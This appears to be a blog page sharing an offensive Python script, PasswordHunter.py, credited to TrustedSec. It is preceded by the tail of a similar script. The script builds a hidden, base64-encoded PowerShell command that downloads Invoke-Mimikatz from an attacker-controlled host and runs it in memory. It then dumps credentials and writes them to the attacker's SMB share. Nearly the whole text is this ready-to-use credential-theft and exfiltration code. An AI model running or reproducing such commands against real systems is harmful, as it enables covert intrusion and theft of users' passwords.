  full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le'))  
  print full_attack

# Standard boilerplate to call the main() function
if __name__ == '__main__':
  main()

PasswordHunter.py

#!/usr/bin/env python

# This download "Invoke-Mimikatz.ps1" from the attacker's webhost,
# then execute the script in memory and pipe its output ot the attacker's SMB share
# "\\loot$\passwords\".
#
# Formulated mainly from the following articles/tools
# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
# https://github.com/trustedsec/unicorn
#
# TrustedSec

import base64

attacker_ip = "<put your IP here>"

# Main guts
def main():
  powershell_code = "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip + "/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1\");Invoke-Mimikatz -DumpCreds |Out-File -Encoding \"UTF8\" -FilePath \\\\" + attacker_ip + "\\loot$\\passwords\\$env:computername.txt"
  full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le'))  
  print full_attack

# Standard boilerplate to call the main() function
if __name__ == '__main__':
  main()

No Comments